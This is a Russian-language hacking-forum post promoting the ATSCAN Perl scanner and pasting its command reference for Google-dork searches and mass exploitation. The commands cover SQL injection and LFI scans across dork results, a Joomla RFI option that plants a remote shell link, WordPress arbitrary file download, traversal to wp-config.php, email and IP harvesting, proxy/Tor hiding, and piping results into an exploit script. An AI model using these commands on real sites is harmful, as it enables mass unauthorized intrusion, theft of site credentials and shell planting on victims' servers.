![]() |
Приветствую обитателей форума, с удивлением узнал что нет на нашем борде обзора на этот замечательный сканер который в умелых руках и за cчет его функционала можно найти все, повторюсь именно ВСЁ.
Так же его плюсом является что он написан на языке perl что и делает его простую установку на любую ОС что бы не быть много словным посмотрите веселые мультики про него и подпишитесь на канал разработчика этого крутого сканера! вот примеры поиска от разработчика данного сканера: ATSCAN SCANNER Advanced Search / Dork / Mass Exploitation Scanner Код: Код:
Search engine Google / Bing / Ask / Yandex / Sogouhttps://forum.antichat.xyz/attachmen...0ec4c50d68.png https://forum.antichat.xyz/attachmen...b5ecbd020e.png Код: Код:
–help / -h / -? Help.Код: Код:
git clone https://github.com/AlisamTechnology/ATSCAN● PROXY: Tor: –proxy [proxy] [Ex: –proxy socks://localhost:9050]. Proxy: Proxy: –proxy [proxy] Ex: http://12.32.1.5:8080 or –proxy list.txt Ex: –proxy my_proxies.txt ● RANDOM: Random proxy: –proxy-random [proxy list.txt] Random browser: –b-random Random engine: –m-random ● SET HEADERS: atscan –dork [dork / dorks.txt] –level [level] –header “Authorization:Basic YWRtaW46YWRtaW4 [OTHER]keep_alive:1” atscan -t target –data “name:userfile[DATAFILE]value:file.txt –post –header “Authorization:Basic YWRtaW46YWRtaW4 [OTHER]keep_alive:1” ● SEARCH ENGINE: Search: atscan –dork [dork] –level [level] Search: atscan -d [dork] -l [level] Set engine: atscan –dork [dork] –level [level] -m [Bing: 1][Google: 2][Ask: 3][Yandex: 4][Sogou: 5][All: all] Set selective engines: atscan -d [dork] -l [level] -m 1,2,3.. Search with many dorks: atscan –dork dork1 [OTHER]dork2 [OTHER]dork3] –level [level] Search and rand: atscan -d [dork] -l [level] –expHost “/index.php?id=rang(1-9)” –sql Get Server sites: atscan -t [ip] –level [value] –sites Get Server sites: atscan -t “[ip from]-[ip to]” –level [value] –sites Get Server sites: atscan -t “ip1 [OTHER]ip2” –level [value] –sites Get Server wordpress sites: atscan -t [ip] –level [value] –wp Get Server joomla sites: atscan -t [ip] –level value] –joom Get Server upload sites: atscan -t [ip] –level [value] –upload Get Server zip sites files: atscan -t [ip] –level value] –zip WP Arbitry File Download: atscan -t [ip] –level [[[value] –wpafd Joomla RFI: atscan -t [ip] –level [10] –joomfri –shell [shell link] Search + output: atscan –dork [dorks.txt] –level [level] –save Search + get emails: atscan -d [dorks.txt] -l [level] –email Search + get site emails: atscan –dork site:site.com –level [level] –email Search + get ips: atscan –dork [dork] –level [level] –ip ● REGULAR EXPRESSIONS: Regex use: atscan [–dork [dork> / -t [target]] –level [level] –regex [regex] IP: ((??:25[0-5]|2[0-4][0-9]|[01]?[0-9][0-9]?)\.){ 3}(?:25[0-5]|2[0-4][0-9]|[01]?[0-9][0-9]?)) E-mails: ‘((([A-Za-z0-9]+_+)|([A-Za-z0-9]+\-+)|([A-Za-z0-9]+\.+)|([A-Za-z0-9]+\++))*[A-Za-z0-9]+@((\w+\-+)|(\w+\.))*\w{1,63}\.[a-zA-Z]{2,6})’ ● REPEATER: atscan -t site.com?index.php?id=rang(1-10) –sql atscan -t [target] –expHost “/index.php?id=rang(1-10)” –sql atscan -t [target] –expHost “/index.php?id=repeat(../-9)wp-config.php” ● PORTS atscan -t [ip] –port [port] [–udp / –tcp] atscan -t (ip start)-(ip end) –port [port] [–udp / –tcp] atscan -t [ip] –port (port start)-(port end) [–udp / –tcp] –command “your extern command” ● ENCODE / DECODE: Generate MD5: –md5 [string] Encode base64: –encode64 [string] Decode base64: –decode64 [string] ● DATA: Post data: atscan -t [target] –data “field1:value1 [DATA]field2:value2 [DATA]field3:value3” [–post / –get] Wordlist: atscan -t [target] –data “name:userfile [DATAFILE]value:file.txt” [–post / –get] atscan -t [target] –data “username:john [DATA]pass:1234” [–post / –get] Post + Validation: –data “name:userfile [DATAFILE]value:file.txt” -v [string] / –status Код: [CODE] [–post / –get] ● EXTERNAL COMMANDES: atscan –dork [dork / dorks.txt] –level [level] –command “curl -v –TARGET” atscan –dork [dork / dorks.txt] –level [level] –command “curl -v –HOST” atscan –dork [dork / dorks.txt] –level [level] –command “nmap -sV -p 21,22,80 –HOSTIP” atscan -d “index of /lib/scripts/dl-skin.php” -l 20 -m 2 –command “php WP-dl-skin.php-exploit.php –TARGET” ● MULTIPLE SCANS: atscan –dork [dork> –level [10] –sql –lfi –wp .. atscan –dork [dork> –level [10] –replace [string] –with [string] –exp/expHost [payload] [–sql / –lfi / –wp /…] atscan -t [ip] –level [10] [–sql / –lfi / –wp /…] atscan -t [target] [–sql / –lfi / –wp /…] ● USER PAYLOADS: atscan –dork [dork] –level [10] [–lfi | –sql ..] –payload [payload | payloads.txt] ● SEARCH VALIDATION: atscan -d [dork / dorks.txt] -l [level] –status [code] / –valid [string] atscan -d [dork / dorks.txt] -l [level] –status [code] –none (Positive when status does\’nt match) atscan -d [dork / dorks.txt] -l [level] –status [code] / -v [string] / –ifinurl [string] / –sregex [regex] –none atscan -d [dork / dorks.txt] -l [level] –ifinurl [string] atscan -d [dork / dorks.txt] -l [level] –sregex [regex] –valid [string] atscan -d [dork / dorks.txt] -l [level] –regex [regex] –valid [string] atscan -d [dork / dorks.txt] -l [level] –unique ● SCAN VALIDATION: atscan -t [target / targets.txt] [–status [code] / –valid [string] atscan -d [dork / dorks.txt] -l [level] –exp/expHost [payload] –status [code] / –valid [string] atscan -d [dorks.txt] -l [level] –replace [string] –with [string] –status [code] / –valid [string] atscan -d [dork / dorks.txt] -l [level] [–admin / –sql ..] –status [code] / –valid [string] atscan -d [dorks.txt] -l [level] –replace [string] –with [string] –status [code] / –valid [string] atscan -d [dorks.txt] -l [level] –replace [string] –with [string] –full –status [code] / –valid [string] atscan -d [dorks.txt] -l [level] –replace [string] –with [string] –exp/expHost [payload] –status [code] / –valid [string] atscan –data “name:userfile[DATAFILE]value:file.txt” -v [string] / –status [code] [–post / –get] atscan -d [dork / dorks.txt] -l [level] [–sql / –shost ..] –status Код:
/ –valid [string] |
пример запуска для любителей windows
|
| Время: 20:39 |